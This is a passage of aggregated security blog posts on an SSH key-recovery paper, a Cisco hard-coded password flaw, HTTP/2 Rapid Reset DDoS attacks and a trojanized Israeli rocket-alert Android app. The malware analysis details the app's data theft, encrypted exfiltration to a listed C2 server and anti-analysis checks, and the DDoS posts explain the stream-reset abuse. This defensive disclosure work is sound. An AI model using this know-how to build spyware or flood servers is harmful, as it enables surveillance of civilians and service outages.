The credentials exposed provided access to a range of resources, including Microsoft Active Directory servers that provision and manage accounts in enterprise networks, OAuth servers allowing single sign-on, SSH servers, and third-party services for customer communications and cryptocurrencies. Examples included:

  • Azure Active Directory API Keys
  • GitHub OAuth App Keys
  • Database credentials for providers such as MongoDB, MySQL, and PostgreSQL
  • Dropbox Key
  • Auth0 Keys
  • SSH Credentials
  • Coinbase Credentials
  • Twilio Master Credentials.

New SSH Vulnerability

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/11/new-ssh-vulnerability.html

This is interesting:

For the first time, researchers have demonstrated that a large portion of cryptographic keys used to protect data in computer-to-server SSH traffic are vulnerable to complete compromise when naturally occurring computational errors occur while the connection is being established.

[…]

The vulnerability occurs when there are errors during the signature generation that takes place when a client and server are establishing a connection. It affects only keys using the RSA cryptographic algorithm, which the researchers found in roughly a third of the SSH signatures they examined. That translates to roughly 1 billion signatures out of the 3.2 billion signatures examined. Of the roughly 1 billion RSA signatures, about one in a million exposed the private key of the host.

Research paper:

Passive SSH Key Compromise via Lattices

Abstract: We demonstrate that a passive network attacker can opportunistically obtain private RSA host keys from an SSH server that experiences a naturally arising fault during signature computation. In prior work, this was not believed to be possible for the SSH protocol because the signature included information like the shared Diffie-Hellman secret that would not be available to a passive network observer. We show that for the signature parameters commonly in use for SSH, there is an efficient lattice attack to recover the private key in case of a signature fault. We provide a security analysis of the SSH, IKEv1, and IKEv2 protocols in this scenario, and use our attack to discover hundreds of compromised keys in the wild from several independently vulnerable implementations.

Malicious “RedAlert – Rocket Alerts” Application Targets Israeli Phone Calls, SMS, and User Information

Post Syndicated from Blake Darché original http://blog.cloudflare.com/malicious-redalert-rocket-alerts-application-targets-israeli-phone-calls-sms-and-user-information/

Malicious “RedAlert - Rocket Alerts” Application Targets Israeli Phone Calls, SMS, and User Information

Malicious “RedAlert - Rocket Alerts” Application Targets Israeli Phone Calls, SMS, and User Information

On October 13, 2023, Cloudflare’s Cloudforce One Threat Operations Team became aware of a website hosting a Google Android Application (APK) impersonating the legitimate RedAlert – Rocket Alerts application (https://play.google.com/store/apps/details?id=com.red.alert&hl=en&pli=1).  More than 5,000 rockets have been launched into Israel since the attacks from Hamas began on October 7th 2023.  RedAlert – Rocket Alerts developed by Elad Nava allows individuals to receive timely and precise alerts about incoming airstrikes. Many people living in Israel rely on these alerts to seek safety – a service which has become increasingly important given the newest escalations in the region.

Applications alerting of incoming airstrikes have become targets as only days ago, Pro-Palestinian hacktivist group AnonGhost exploited a vulnerability in another application, “Red Alert: Israel” by Kobi Snir. (https://cybernews.com/cyber-war/israel-redalert-breached-anonghost-hamas/) Their exploit allowed them to intercept requests, expose servers and APIs, and send fake alerts to some app users, including a message that a “nuclear bomb is coming”. AnonGhost also claimed they attacked other rocket alert applications, including RedAlert by Elad Nava. As of October 11, 2023, the RedAlert app was reportedly functioning normally.

In the last two days, a new malicious website (hxxps://redalerts[.]me) has advertised the download of well-known open source application RedAlert by Elad Nava (https://github.com/eladnava/redalert-android). Domain impersonation continues to be a popular vector for attackers, as the legitimate website for the application (hxxps://redalert[.]me ) differs from the malicious website by only one letter. Further, threat actors continue to exploit open source code and deploy modified, malicious versions to unsuspecting users.

The malicious website hosted links to both the iOS and the Android version of the RedAlert app. But while the link to the Apple App Store referred to the legitimate version of the RedAlert app by Elad Nava, the link supposedly referring to the Android version hosted on the Play Store directly downloads a malicious APK file. This attack demonstrates the danger of sideloading applications directly from the Internet as opposed to installing applications from the approved app store.

The malicious RedAlert version imitates the legitimate rocket alert application but simultaneously collects sensitive user data. Additional permissions requested by the malicious app include access to contacts, call logs, SMS, account information, as well as an overview of all installed apps.

The website hosting the malicious file was created on October 12, 2023 and has since been taken offline. Only users who installed the Android version of the app from this specific website are impacted and urgently advised to delete the app. Users can determine if they installed the malicious version by reviewing the permissions granted to the RedAlert app. If users are unsure whether they installed the malicious version, they can delete the RedAlert applications and reinstall the legitimate version directly in the Play Store.

Malicious “RedAlert - Rocket Alerts” Application Targets Israeli Phone Calls, SMS, and User Information
Screenshot of the attacker site https://redalerts[.]me

Malicious Android Package Kit (APK) Analysis

The malicious Android Package Kit (APK) file is installed by a user when they click the Google Play button on the fake RedAlert site. Once clicked, the user downloads the app directly from the fake site at hxxps://redalerts[.]me/app.apk. The SHA-256 hash of the APK is 5087a896360f5d99fbf4eb859c824d19eb6fa358387bf6c2c5e836f7927921c5.

Capabilities

A quick analysis of the AndroidManifest.xml file shows several differences compared to the legitimate, open source RedAlert application. Most notable are the additional permissions needed to collect information on the victim. The permissions added are listed below:

  • android.permission.GET_ACCOUNTS
  • android.permission.QUERY_ALL_PACKAGES
  • android.permission.READ_CALL_LOG
  • android.permission.READ_CONTACTS
  • android.permission.READ_PHONE_NUMBERS
  • android.permission.READ_PHONE_STATE
  • android.permission.READ_PRIVILEGED_PHONE_STATE
  • android.permission.READ_SMS

The application is designed to look and act like RedAlert. However, upon opening the app, a malicious service is started in the background. The startService() call is the only change to the onCreate() method, and this begins the sequence of malicious activity, which the actor has placed in a package called com.company.allinclusive.AI

Malicious “RedAlert - Rocket Alerts” Application Targets Israeli Phone Calls, SMS, and User Information
The attacker starts their malicious code within the legitimate RedAlert code com.red.alert.activities: Main.java

The service is run to gather data from victims’ phones and upload it to the actor’s secure server. The data is extensive and includes:

  • SIM information, including IMEI and IMSI numbers, network type, country, voicemail number, PIN status, and more
  • Full Contact list
  • All SMS messages, including content and metadata for all statuses (e.g. received, outgoing, sent, etc.)
  • A list of accounts associated with the device
  • All phone calls and conversation details for including incoming, outgoing, missed, rejected, and blocked calls
  • Logged-in email and app accounts
  • List of installed applications

The actor’s code for gathering this information is illustrated below.

Malicious “RedAlert - Rocket Alerts” Application Targets Israeli Phone Calls, SMS, and User Information
com.company.allinclusive.AI: AIMain.java contains the data the attacker will capture form the target

Stolen data is uploaded to an HTTP server at a hardcoded IP address. The actor has a Tools class which details the IP address where the data is to be uploaded:

Malicious “RedAlert - Rocket Alerts” Application Targets Israeli Phone Calls, SMS, and User Information
com.company.allinclusive.AI: Tools.java stores the attackers command and control for the malware

Although HTTP and port 80 are specified, the actor appears to have the ability to use HTTPS and port 443 if a certificate is found bundled within the application package:

Malicious “RedAlert - Rocket Alerts” Application Targets Israeli Phone Calls, SMS, and User Information
com.company.allinclusive.AI: UploadFileAsync.java

Data is uploaded through a Connector class, written by the actor. The Connector is responsible for encrypting the stolen data and uploading it to the HTTP server. In this sample, files are encrypted with AES in CBC mode with PKCS5 Padding. The keys are randomly generated and appended to the packaged data, however the keys are encrypted with RSA using a public key bundled in the malicious app. Because of this, anybody who is able to intercept the stolen data will be unable to decrypt it without the actor’s private key.

The encrypted files have names that look like <ID>_<DATE>.final, which contain:

  • <ID>_<DATE>.enc (encrypted data)
  • <ID>_<DATE>.param (AES encryption parameters, e.g. key and IV)
  • <ID>_<DATE>.eparam (RSA parameters, e.g. public key)

Anti-Analysis Runtime Capabilities

To avoid detection the actor included anti-analysis capabilities which can run at the time the app is started. The methods for anti-analysis that the attacker has included were anti-debugging, anti-emulation, and anti-test operations

Anti-Debugging

The application makes a simple call using the builtin android.os.Debug package to see if the application is being debugged.

Malicious “RedAlert - Rocket Alerts” Application Targets Israeli Phone Calls, SMS, and User Information
com.company.allinclusive.AI.anti.debugger: FindDebugger.java

Anti-Emulation

The application attempts to locate certain files and identifiers to determine whether it is being run in an emulated environment. A snippet of these indicators are shown below:

Malicious “RedAlert - Rocket Alerts” Application Targets Israeli Phone Calls, SMS, and User Information
com.company.allinclusive.AI.anti.emulator: FindEmulator.java checks for common emulators

Anti-Test

The application has utilities to identify whether a test user (“monkey”) is using the application:

Malicious “RedAlert - Rocket Alerts” Application Targets Israeli Phone Calls, SMS, and User Information
com.company.allinclusive.AI.anti.monkey: FindMonkey.java

These methodologies are all rudimentary checks for whether the application is under runtime analysis. It does not, however, protect the malicious code against static analysis.

How To Detect This Malware On Your Device

If you have installed RedAlert on your device, the extraneous permissions added by the actor can be used to determine whether you have been compromised. The following permissions appearing on the RedAlert app (whether or not enabled) would indicate compromise:

  • Call Logs
  • Contacts
  • Phone
  • SMS

How To Protect Yourself

You can avoid attacks like this by following the guidance below:

  • Keep your mobile device up to date on the latest software version at all times
  • Consider using Cloudflare Teams (with Cloudflare Gateway)
  • Avoid using third party mobile application stores
  • Never install applications from Internet URLs or sideload payloads
  • Consider using 1.1.1.1 for families to block malicious domains on your network

IOCs

Type

Indicator

Malicious RedAlert APK Download URL

hxxp://redalerts[.]me/app.apk

Malicious RedAlert APK Command and Control

hxxp://23.254.228[.]135:80/file.php

Malicious RedAlert APK

5087a896360f5d99fbf4eb859c824d19eb6fa358387bf6c2c5e836f7927921c5

Public key, RSA/ECB/PKCS1Padding

MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvBYe8dLw1TVH39EVQEwCr7kgBRtQz2M2vQbgkbr0UiTFm0Tk9KVZ1jn0uVgJ+dh1I7uuIfzFEopFQ35OxRnjmNAJsOYpYA5ZvD2llS+KUyE4TRJZGh+dfGjc98dCGCVW9aPVuyfciFNpzGU+lUV/nIbi8xmHOSzho+GZvrRWNDvJqmX7Xunjr1crAKIpG1kF8bpa9+VkoKnMOqFBTc6aPEmwj4CmeTsTy+j7ubdKc8tsdoCTGfrLzVj4wlGDjtf06dYEtZ6zvdBbzb4UA6Ilxsb12KY03qdlqlFREqCxjtJUYDEYChnpOSkrzpLOu+TTkAlW68+u6JjgE8AAAnjpIGRRNvuj5ZfTS3Ub3xEABBRUuHcesseuaN3wVwvMBIMbWJabVUWUNWYyCewxrtdrc8HStECbS/b05j2lv6Cl1Qv1iQefurL/hvfREmxlHAnkCmzTxlrEStHHnNmhWOccQI+u0VO6klJShNg8XlRsKXnqpPi3aicki+QMo3i1oWOve6aWkAIJvmHaY4Gmz0nX2foxlJ2YxOGQe0rUAqDXa8S6tYSmIyCYJoTmllvwJAEpCtOFxerZIAa/1BaxYFhH/iQUzzayJuc6ooUmKLw7q72pe3tN0cRT3RAJUmRwTcV5hL+UQgakkSzIMFBpM/rpvNC0Qy94mtpNf6iA6gbKm40CAwEAAQ==


Under attack? Contact our hotline to speak with someone immediately.Visit 1.1.1.1 from any device to get started with our free app that makes your Internet faster and safer.To learn more about our mission to help build a better Internet, start here. If you’re looking for a new career direction, check out our open positions.

Cisco Can’t Stop Using Hard-Coded Passwords

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/10/cisco-cant-stop-using-hard-coded-passwords.html

There’s a new Cisco vulnerability in its Emergency Responder product:

This vulnerability is due to the presence of static user credentials for the root account that are typically reserved for use during development. An attacker could exploit this vulnerability by using the account to log in to an affected system. A successful exploit could allow the attacker to log in to the affected system and execute arbitrary commands as the root user.

This is not the first time Cisco products have had hard-coded passwords made public. You’d think it would learn.

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

Post Syndicated from Lucas Pardue original http://blog.cloudflare.com/technical-breakdown-http2-rapid-reset-ddos-attack/

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

Starting on Aug 25, 2023, we started to notice some unusually big HTTP attacks hitting many of our customers. These attacks were detected and mitigated by our automated DDoS system. It was not long however, before they started to reach record breaking sizes — and eventually peaked just above 201 million requests per second. This was nearly 3x bigger than our previous biggest attack on record.

Concerning is the fact that the attacker was able to generate such an attack with a botnet of merely 20,000 machines. There are botnets today that are made up of hundreds of thousands or millions of machines. Given that the entire web typically sees only between 1–3 billion requests per second, it's not inconceivable that using this method could focus an entire web’s worth of requests on a small number of targets.

Detecting and Mitigating

This was a novel attack vector at an unprecedented scale, but Cloudflare's existing protections were largely able to absorb the brunt of the attacks. While initially we saw some impact to customer traffic — affecting roughly 1% of requests during the initial wave of attacks — today we’ve been able to refine our mitigation methods to stop the attack for any Cloudflare customer without it impacting our systems.

We noticed these attacks at the same time two other major industry players — Google and AWS — were seeing the same. We worked to harden Cloudflare’s systems to ensure that, today, all our customers are protected from this new DDoS attack method without any customer impact. We’ve also participated with Google and AWS in a coordinated disclosure of the attack to impacted vendors and critical infrastructure providers.

This attack was made possible by abusing some features of the HTTP/2 protocol and server implementation details (see  CVE-2023-44487 for details). Because the attack abuses an underlying weakness in the HTTP/2 protocol, we believe any vendor that has implemented HTTP/2 will be subject to the attack. This included every modern web server. We, along with Google and AWS, have disclosed the attack method to web server vendors who we expect will implement patches. In the meantime, the best defense is using a DDoS mitigation service like Cloudflare’s in front of any web-facing web or API server.

This post dives into the details of the HTTP/2 protocol, the feature that attackers exploited to generate these massive attacks, and the mitigation strategies we took to ensure all our customers are protected. Our hope is that by publishing these details other impacted web servers and services will have the information they need to implement mitigation strategies. And, moreover, the HTTP/2 protocol standards team, as well as teams working on future web standards, can better design them to prevent such attacks.

RST attack details

HTTP is the application protocol that powers the Web. HTTP Semantics are common to all versions of HTTP — the overall architecture, terminology, and protocol aspects such as request and response messages, methods, status codes, header and trailer fields, message content, and much more. Each individual HTTP version defines how semantics are transformed into a "wire format" for exchange over the Internet. For example, a client has to serialize a request message into binary data and send it, then the server parses that back into a message it can process.

HTTP/1.1 uses a textual form of serialization. Request and response messages are exchanged as a stream of ASCII characters, sent over a reliable transport layer like TCP, using the following format (where CRLF means carriage-return and linefeed):

 HTTP-message   = start-line CRLF
                   *( field-line CRLF )
                   CRLF
                   [ message-body ]

For example, a very simple GET request for https://blog.cloudflare.com/ would look like this on the wire:

GET / HTTP/1.1 CRLFHost: blog.cloudflare.comCRLF

And the response would look like:

HTTP/1.1 200 OK CRLFServer: cloudflareCRLFContent-Length: 100CRLFtext/html; charset=UTF-8CRLF<100 bytes of data>

This format frames messages on the wire, meaning that it is possible to use a single TCP connection to exchange multiple requests and responses. However, the format requires that each message is sent whole. Furthermore, in order to correctly correlate requests with responses, strict ordering is required; meaning that messages are exchanged serially and can not be multiplexed. Two GET requests, for https://blog.cloudflare.com/ and https://blog.cloudflare.com/page/2/, would be:

GET / HTTP/1.1 CRLFHost: blog.cloudflare.comCRLFGET /page/2 HTTP/1.1 CRLFHost: blog.cloudflare.comCRLF  

With the responses:

HTTP/1.1 200 OK CRLFServer: cloudflareCRLFContent-Length: 100CRLFtext/html; charset=UTF-8CRLF<100 bytes of data>HTTP/1.1 200 OK CRLFServer: cloudflareCRLFContent-Length: 100CRLFtext/html; charset=UTF-8CRLF<100 bytes of data>

Web pages require more complicated HTTP interactions than these examples. When visiting the Cloudflare blog, your browser will load multiple scripts, styles and media assets. If you visit the front page using HTTP/1.1 and decide quickly to navigate to page 2, your browser can pick from two options. Either wait for all of the queued up responses for the page that you no longer want before page 2 can even start, or cancel in-flight requests by closing the TCP connection and opening a new connection. Neither of these is very practical. Browsers tend to work around these limitations by managing a pool of TCP connections (up to 6 per host) and implementing complex request dispatch logic over the pool.

HTTP/2 addresses many of the issues with HTTP/1.1. Each HTTP message is serialized into a set of HTTP/2 frames that have type, length, flags, stream identifier (ID) and payload. The stream ID makes it clear which bytes on the wire apply to which message, allowing safe multiplexing and concurrency. Streams are bidirectional. Clients send frames and servers reply with frames using the same ID.

In HTTP/2 our GET request for https://blog.cloudflare.com would be exchanged across stream ID 1, with the client sending one HEADERS frame, and the server responding with one HEADERS frame, followed by one or more DATA frames. Client requests always use odd-numbered stream IDs, so subsequent requests would use stream ID 3, 5, and so on. Responses can be served in any order, and frames from different streams can be interleaved.

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

Stream multiplexing and concurrency are powerful features of HTTP/2. They enable more efficient usage of a single TCP connection. HTTP/2 optimizes resources fetching especially when coupled with prioritization. On the flip side, making it easy for clients to launch large amounts of parallel work can increase the peak demand for server resources when compared to HTTP/1.1. This is an obvious vector for denial-of-service.

In order to provide some guardrails, HTTP/2 provides a notion of maximum active concurrent streams. The SETTINGS_MAX_CONCURRENT_STREAMS parameter allows a server to advertise its limit of concurrency. For example, if the server states a limit of 100, then only 100 requests can be active at any time. If a client attempts to open a stream above this limit, it must be rejected by the server using a RST_STREAM frame. Stream rejection does not affect the other in-flight streams on the connection.

The true story is a little more complicated. Streams have a lifecycle. Below is a diagram of the HTTP/2 stream state machine. Client and server manage their own views of the state of a stream. HEADERS, DATA and RST_STREAM frames trigger transitions when they are sent or received. Although the views of the stream state are independent, they are synchronized.

HEADERS and DATA frames include an END_STREAM flag, that when set to the value 1 (true), can trigger a state transition.

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

Let's work through this with an example of a GET request that has no message content. The client sends the request as a HEADERS frame with the END_STREAM flag set to 1. The client first transitions the stream from idle to open state, then immediately transitions into half-closed state. The client half-closed state means that it can no longer send HEADERS or DATA, only WINDOW_UPDATE, PRIORITY or RST_STREAM frames. It can receive any frame however.

Once the server receives and parses the HEADERS frame, it transitions the stream state from idle to open and then half-closed, so it matches the client. The server half-closed state means it can send any frame but receive only WINDOW_UPDATE, PRIORITY or RST_STREAM frames.

The response to the GET contains message content, so the server sends HEADERS with END_STREAM flag set to 0, then DATA with END_STREAM flag set to 1. The DATA frame triggers the transition of the stream from half-closed to closed on the server. When the client receives it, it also transitions to closed. Once a stream is closed, no frames can be sent or received.

Applying this lifecycle back into the context of concurrency, HTTP/2 states:

Streams that are in the "open" state or in either of the "half-closed" states count toward the maximum number of streams that an endpoint is permitted to open. Streams in any of these three states count toward the limit advertised in the SETTINGS_MAX_CONCURRENT_STREAMS setting.

In theory, the concurrency limit is useful. However, there are practical factors that hamper its effectiveness— which we will cover later in the blog.

HTTP/2 request cancellation

Earlier, we talked about client cancellation of in-flight requests. HTTP/2 supports this in a much more efficient way than HTTP/1.1. Rather than needing to tear down the whole connection, a client can send a RST_STREAM frame for a single stream. This instructs the server to stop processing the request and to abort the response, which frees up server resources and avoids wasting bandwidth.

Let's consider our previous example of 3 requests. This time the client cancels the request on stream 1 after all of the HEADERS have been sent. The server parses this RST_STREAM frame before it is ready to serve the response and instead only responds to stream 3 and 5:

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

Request cancellation is a useful feature. For example, when scrolling a webpage with multiple images, a web browser can cancel images that fall outside the viewport, meaning that images entering it can load faster. HTTP/2 makes this behaviour a lot more efficient compared to HTTP/1.1.

A request stream that is canceled, rapidly transitions through the stream lifecycle. The client's HEADERS with END_STREAM flag set to 1 transitions the state from idle to open to half-closed, then RST_STREAM immediately causes a transition from half-closed to closed.

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

Recall that only streams that are in the open or half-closed state contribute to the stream concurrency limit. When a client cancels a stream, it instantly gets the ability to open another stream in its place and can send another request immediately. This is the crux of what makes CVE-2023-44487 work.

Rapid resets leading to denial of service

HTTP/2 request cancellation can be abused to rapidly reset an unbounded number of streams. When an HTTP/2 server is able to process client-sent RST_STREAM frames and tear down state quickly enough, such rapid resets do not cause a problem. Where issues start to crop up is when there is any kind of delay or lag in tidying up. The client can churn through so many requests that a backlog of work accumulates, resulting in excess consumption of resources on the server.

A common HTTP deployment architecture is to run an HTTP/2 proxy or load-balancer in front of other components. When a client request arrives it is quickly dispatched and the actual work is done as an asynchronous activity somewhere else. This allows the proxy to handle client traffic very efficiently. However, this separation of concerns can make it hard for the proxy to tidy up the in-process jobs. Therefore, these deployments are more likely to encounter issues from rapid resets.

When Cloudflare's reverse proxies process incoming HTTP/2 client traffic, they copy the data from the connection’s socket into a buffer and process that buffered data in order. As each request is read (HEADERS and DATA frames) it is dispatched to an upstream service. When RST_STREAM frames are read, the local state for the request is torn down and the upstream is notified that the request has been canceled. Rinse and repeat until the entire buffer is consumed. However this logic can be abused: when a malicious client started sending an enormous chain of requests and resets at the start of a connection, our servers would eagerly read them all and create stress on the upstream servers to the point of being unable to process any new incoming request.

Something that is important to highlight is that stream concurrency on its own cannot mitigate rapid reset. The client can churn requests to create high request rates no matter the server's chosen value of SETTINGS_MAX_CONCURRENT_STREAMS.

Rapid Reset dissected

Here's an example of rapid reset reproduced using a proof-of-concept client attempting to make a total of 1000 requests. I've used an off-the-shelf server without any mitigations; listening on port 443 in a test environment. The traffic is dissected using Wireshark and filtered to show only HTTP/2 traffic for clarity. Download the pcap to follow along.

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

It's a bit difficult to see, because there are a lot of frames. We can get a quick summary via Wireshark's Statistics > HTTP2 tool:

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

The first frame in this trace, in packet 14, is the server's SETTINGS frame, which advertises a maximum stream concurrency of 100. In packet 15, the client sends a few control frames and then starts making requests that are rapidly reset. The first HEADERS frame is 26 bytes long, all subsequent HEADERS are only 9 bytes. This size difference is due to a compression technology called HPACK. In total, packet 15 contains 525 requests, going up to stream 1051.

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

Interestingly, the RST_STREAM for stream 1051 doesn't fit in packet 15, so in packet 16 we see the server respond with a 404 response.  Then in packet 17 the client does send the RST_STREAM, before moving on to sending the remaining 475 requests.

Note that although the server advertised 100 concurrent streams, both packets sent by the client sent a lot more HEADERS frames than that. The client did not have to wait for any return traffic from the server, it was only limited by the size of the packets it could send. No server RST_STREAM frames are seen in this trace, indicating that the server did not observe a concurrent stream violation.

Impact on customers

As mentioned above, as requests are canceled, upstream services are notified and can abort requests before wasting too many resources on it. This was the case with this attack, where most malicious requests were never forwarded to the origin servers. However, the sheer size of these attacks did cause some impact.

First, as the rate of incoming requests reached peaks never seen before, we had reports of increased levels of 502 errors seen by clients. This happened on our most impacted data centers as they were struggling to process all the requests. While our network is meant to deal with large attacks, this particular vulnerability exposed a weakness in our infrastructure. Let's dig a little deeper into the details, focusing on how incoming requests are handled when they hit one of our data centers:

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

We can see that our infrastructure is composed of a chain of different proxy servers with different responsibilities. In particular, when a client connects to Cloudflare to send HTTPS traffic, it first hits our TLS decryption proxy: it decrypts TLS traffic, processes HTTP 1, 2 or 3 traffic, then forwards it to our "business logic" proxy. This one is responsible for loading all the settings for each customer, then routing the requests correctly to other upstream services — and more importantly in our case, it is also responsible for security features. This is where L7 attack mitigation is processed.

The problem with this attack vector is that it manages to send a lot of requests very quickly in every single connection. Each of them had to be forwarded to the business logic proxy before we had a chance to block it. As the request throughput became higher than our proxy capacity, the pipe connecting these two services reached its saturation level in some of our servers.

When this happens, the TLS proxy cannot connect anymore to its upstream proxy, this is why some clients saw a bare "502 Bad Gateway" error during the most serious attacks. It is important to note that, as of today, the logs used to create HTTP analytics are also emitted by our business logic proxy. The consequence of that is that these errors are not visible in the Cloudflare dashboard. Our internal dashboards show that about 1% of requests were impacted during the initial wave of attacks (before we implemented mitigations), with peaks at around 12% for a few seconds during the most serious one on August 29th. The following graph shows the ratio of these errors over a two hours while this was happening:

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

We worked to reduce this number dramatically in the following days, as detailed later on in this post. Both thanks to changes in our stack and to our mitigation that reduce the size of these attacks considerably, this number is today is effectively zero:

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

499 errors and the challenges for HTTP/2 stream concurrency

Another symptom reported by some customers is an increase in 499 errors. The reason for this is a bit different and is related to the maximum stream concurrency in a HTTP/2 connection detailed earlier in this post.

HTTP/2 settings are exchanged at the start of a connection using SETTINGS frames. In the absence of receiving an explicit parameter, default values apply. Once a client establishes an HTTP/2 connection, it can wait for a server's SETTINGS (slow) or it can assume the default values and start making requests (fast). For SETTINGS_MAX_CONCURRENT_STREAMS, the default is effectively unlimited (stream IDs use a 31-bit number space, and requests use odd numbers, so the actual limit is 1073741824). The specification recommends that a server offer no fewer than 100 streams. Clients are generally biased towards speed, so don't tend to wait for server settings, which creates a bit of a race condition. Clients are taking a gamble on what limit the server might pick; if they pick wrong the request will be rejected and will have to be retried. Gambling on 1073741824 streams is a bit silly. Instead, a lot of clients decide to limit themselves to issuing 100 concurrent streams, with the hope that servers followed the specification recommendation. Where servers pick something below 100, this client gamble fails and streams are reset.

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

There are many reasons a server might reset a stream beyond concurrency limit overstepping. HTTP/2 is strict and requires a stream to be closed when there are parsing or logic errors. In 2019, Cloudflare developed several mitigations in response to HTTP/2 DoS vulnerabilities. Several of those vulnerabilities were caused by a client misbehaving, leading the server to reset a stream. A very effective strategy to clamp down on such clients is to count the number of server resets during a connection, and when that exceeds some threshold value, close the connection with a GOAWAY frame. Legitimate clients might make one or two mistakes in a connection and that is acceptable. A client that makes too many mistakes is probably either broken or malicious and closing the connection addresses both cases.

While responding to DoS attacks enabled by CVE-2023-44487, Cloudflare reduced maximum stream concurrency to 64. Before making this change, we were unaware that clients don't wait for SETTINGS and instead assume a concurrency of 100. Some web pages, such as an image gallery, do indeed cause a browser to send 100 requests immediately at the start of a connection. Unfortunately, the 36 streams above our limit all needed to be reset, which triggered our counting mitigations. This meant that we closed connections on legitimate clients, leading to a complete page load failure. As soon as we realized this interoperability issue, we changed the maximum stream concurrency to 100.

Actions from the Cloudflare side

In 2019 several DoS vulnerabilities were uncovered related to implementations of HTTP/2. Cloudflare developed and deployed a series of detections and mitigations in response.  CVE-2023-44487 is a different manifestation of HTTP/2 vulnerability. However, to mitigate it we were able to extend the existing protections to monitor client-sent RST_STREAM frames and close connections when they are being used for abuse. Legitimate client uses for RST_STREAM are unaffected.

In addition to a direct fix, we have implemented several improvements to the server's HTTP/2 frame processing and request dispatch code. Furthermore, the business logic server has received improvements to queuing and scheduling that reduce unnecessary work and improve cancellation responsiveness. Together these lessen the impact of various potential abuse patterns as well as giving more room to the server to process requests before saturating.

Mitigate attacks earlier

Cloudflare already had systems in place to efficiently mitigate very large attacks with less expensive methods. One of them is named "IP Jail". For hyper volumetric attacks, this system collects the client IPs participating in the attack and stops them from connecting to the attacked property, either at the IP level, or in our TLS proxy. This system however needs a few seconds to be fully effective; during these precious seconds, the origins are already protected but our infrastructure still needs to absorb all HTTP requests. As this new botnet has effectively no ramp-up period, we need to be able to neutralize attacks before they can become a problem.

To achieve this we expanded the IP Jail system to protect our entire infrastructure: once an IP is "jailed", not only it is blocked from connecting to the attacked property, we also forbid the corresponding IPs from using HTTP/2 to any other domain on Cloudflare for some time. As such protocol abuses are not possible using HTTP/1.x, this limits the attacker's ability to run large attacks, while any legitimate client sharing the same IP would only see a very small performance decrease during that time. IP based mitigations are a very blunt tool — this is why we have to be extremely careful when using them at that scale and seek to avoid false positives as much as possible. Moreover, the lifespan of a given IP in a botnet is usually short so any long term mitigation is likely to do more harm than good. The following graph shows the churn of IPs in the attacks we witnessed:

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

As we can see, many new IPs spotted on a given day disappear very quickly afterwards.

As all these actions happen in our TLS proxy at the beginning of our HTTPS pipeline, this saves considerable resources compared to our regular L7 mitigation system. This allowed us to weather these attacks much more smoothly and now the number of random 502 errors caused by these botnets is down to zero.

Observability improvements

Another front on which we are making change is observability. Returning errors to clients without being visible in customer analytics is unsatisfactory. Fortunately, a project has been underway to overhaul these systems since long before the recent attacks. It will eventually allow each service within our infrastructure to log its own data, instead of relying on our business logic proxy to consolidate and emit log data. This incident underscored the importance of this work, and we are redoubling our efforts.

We are also working on better connection-level logging, allowing us to spot such protocol abuses much more quickly to improve our DDoS mitigation capabilities.

Conclusion

While this was the latest record-breaking attack, we know it won’t be the last. As attacks continue to become more sophisticated, Cloudflare works relentlessly to proactively identify new threats — deploying countermeasures to our global network so that our millions of customers are immediately and automatically protected.

Cloudflare has provided free, unmetered and unlimited DDoS protection to all of our customers since 2017. In addition, we offer a range of additional security features to suit the needs of organizations of all sizes. Contact us if you’re unsure whether you’re protected or want to understand how you can be.

HTTP/2 Zero-Day Vulnerability Results in Record-Breaking DDoS Attacks

Post Syndicated from Grant Bourzikas original http://blog.cloudflare.com/zero-day-rapid-reset-http2-record-breaking-ddos-attack/

HTTP/2 Zero-Day Vulnerability Results in Record-Breaking DDoS Attacks

HTTP/2 Zero-Day Vulnerability Results in Record-Breaking DDoS Attacks

Earlier today, Cloudflare, along with Google and Amazon AWS, disclosed the existence of a novel zero-day vulnerability dubbed the “HTTP/2 Rapid Reset” attack. This attack exploits a weakness in the HTTP/2 protocol to generate enormous, hyper-volumetric Distributed Denial of Service (DDoS) attacks. Cloudflare has mitigated a barrage of these attacks in recent months, including an attack three times larger than any previous attack we’ve observed, which exceeded 201 million requests per second (rps). Since the end of August 2023, Cloudflare has mitigated more than 1,100 other attacks with over 10 million rps — and 184 attacks that were greater than our previous DDoS record of 71 million rps.

This zero-day provided threat actors with a critical new tool in their Swiss Army knife of vulnerabilities to exploit and attack their victims at a magnitude that has never been seen before. While at times complex and challenging to combat, these attacks allowed Cloudflare the opportunity to develop purpose-built technology to mitigate the effects of the zero-day vulnerability.

If you are using Cloudflare for HTTP DDoS mitigation, you are protected. And below, we’ve included more information on this vulnerability, and resources and recommendations on what you can do to secure yourselves.

Deconstructing the attack: What every CSO needs to know

In late August 2023, our team at Cloudflare noticed a new zero-day vulnerability, developed by an unknown threat actor, that exploits the standard HTTP/2 protocol — a fundamental protocol that is critical to how the Internet and all websites work. This novel zero-day vulnerability attack, dubbed Rapid Reset, leverages HTTP/2’s stream cancellation feature by sending a request and immediately canceling it over and over.  

By automating this trivial “request, cancel, request, cancel” pattern at scale, threat actors are able to create a denial of service and take down any server or application running the standard implementation of HTTP/2. Furthermore, one crucial thing to note about the record-breaking attack is that it involved a modestly-sized botnet, consisting of roughly 20,000 machines. Cloudflare regularly detects botnets that are orders of magnitude larger than this — comprising hundreds of thousands and even millions of machines. For a relatively small botnet to output such a large volume of requests, with the potential to incapacitate nearly any server or application supporting HTTP/2, underscores how menacing this vulnerability is for unprotected networks.

